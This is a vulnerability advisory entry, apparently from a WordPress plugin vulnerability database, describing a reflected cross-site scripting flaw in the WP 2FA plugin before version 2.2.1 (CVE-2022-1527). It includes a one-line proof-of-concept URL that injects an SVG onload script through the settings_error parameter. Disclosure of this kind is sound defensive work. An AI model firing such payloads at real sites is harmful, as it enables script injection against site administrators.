WordPress Plugin Vulnerabilities

WP 2FA < 2.2.1 - Reflected Cross-Site Scripting

Description

The plugin does not sanitise and escape a parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin.php?page=wp-2fa-settings&settings_error=<svg/onload=prompt(/XSS/)>

Affects Plugins

Plugin icon
wp-2fa
Fixed in 2.2.1

References

CVE
CVE-2022-1527

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Utkarsh Agrawal
Submitter
Utkarsh Agrawal
Submitter website
https://smart7.in
Submitter twitter
agrawalsmart7
Verified
Yes
WPVDB ID
0260d5c0-52a9-44ce-b7be-aff642056d16

Timeline

Publicly Published
2022-05-06 (about 2 years ago)
Added
2022-05-06 (about 2 years ago)
Last Updated
2022-05-06 (about 2 years ago)

Other

Published
Title
Published
2022-11-28
Title
External Media < 1.0.36 - Admin+ Stored XSS
Published
2021-09-09
Title
GNU-Mailman Integration <= 1.0.6 - Reflected Cross-Site Scripting
Published
2024-04-09
Title
ProfilePress < 4.15.6 - Contributor+ Stored Cross-Site Scripting via 'reg-single-checkbox'
Published
2022-07-26
Title
Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting
Published
2024-04-05
Title
Icegram Express < 5.7.16 - Authenticated (Administrator+) Cross-Site Scripting via CSV import